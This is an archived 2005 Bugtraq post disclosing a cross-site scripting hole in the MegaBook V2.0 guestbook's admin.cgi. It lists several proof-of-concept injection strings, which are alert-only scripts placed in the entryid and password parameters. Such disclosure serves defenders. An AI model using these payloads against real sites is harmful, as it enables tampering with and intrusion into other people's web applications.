MegaBook V2.0 - Cross Site Scripting Exploit
From: Spy Hat (spyhat_at_spyhat.com)
Date: 05/05/05
- Previous message: Felix: "MRO Maximo v4 & v5"
- Next in thread: Morning Wood: "Re: MegaBook V2.0 - Cross Site Scripting Exploit"
- Maybe reply: Morning Wood: "Re: MegaBook V2.0 - Cross Site Scripting Exploit"
- Maybe reply: Spy Hat: "Re: MegaBook V2.0 - Cross Site Scripting Exploit"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: 5 May 2005 10:45:51 -0000 To: bugtraq@securityfocus.com('binary' encoding is not supported, stored as-is)
The ultimate CGI Guestbook Scripts MegaBook V2.0 appears vulnerable to Cross Site Scripting, which will allow the attacker to modify the post in the guestbook. The affected scripts is admin.cgi
URL: (http://www.(yourdomain).com/(yourcgidir)/admin.cgi)
I have tested the script with the following query:
?action=modifypost&entryid="><script>alert('wvs-xss-magic-string-703410097');</script>
I have also tested the script with theses POST variables:
action=modifypost&entryid=66&password=<script>alert('wvs-xss-magic-string-188784308');</script>
action=modifypost&entryid=66&password='><script>alert('wvs-xss-magic-string-486624156');</script>
action=modifypost&entryid=66&password="><script>alert('wvs-xss-magic-string-1852691616');</script>
action=modifypost&entryid=66&password=><script>alert('wvs-xss-magic-string-429380114');</script>
action=modifypost&entryid=66&password=</textarea><script>alert('wvs-xss-magic-string-723975367');</script>
Yours,
SpyHat
- Previous message: Felix: "MRO Maximo v4 & v5"
- Next in thread: Morning Wood: "Re: MegaBook V2.0 - Cross Site Scripting Exploit"
- Maybe reply: Morning Wood: "Re: MegaBook V2.0 - Cross Site Scripting Exploit"
- Maybe reply: Spy Hat: "Re: MegaBook V2.0 - Cross Site Scripting Exploit"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
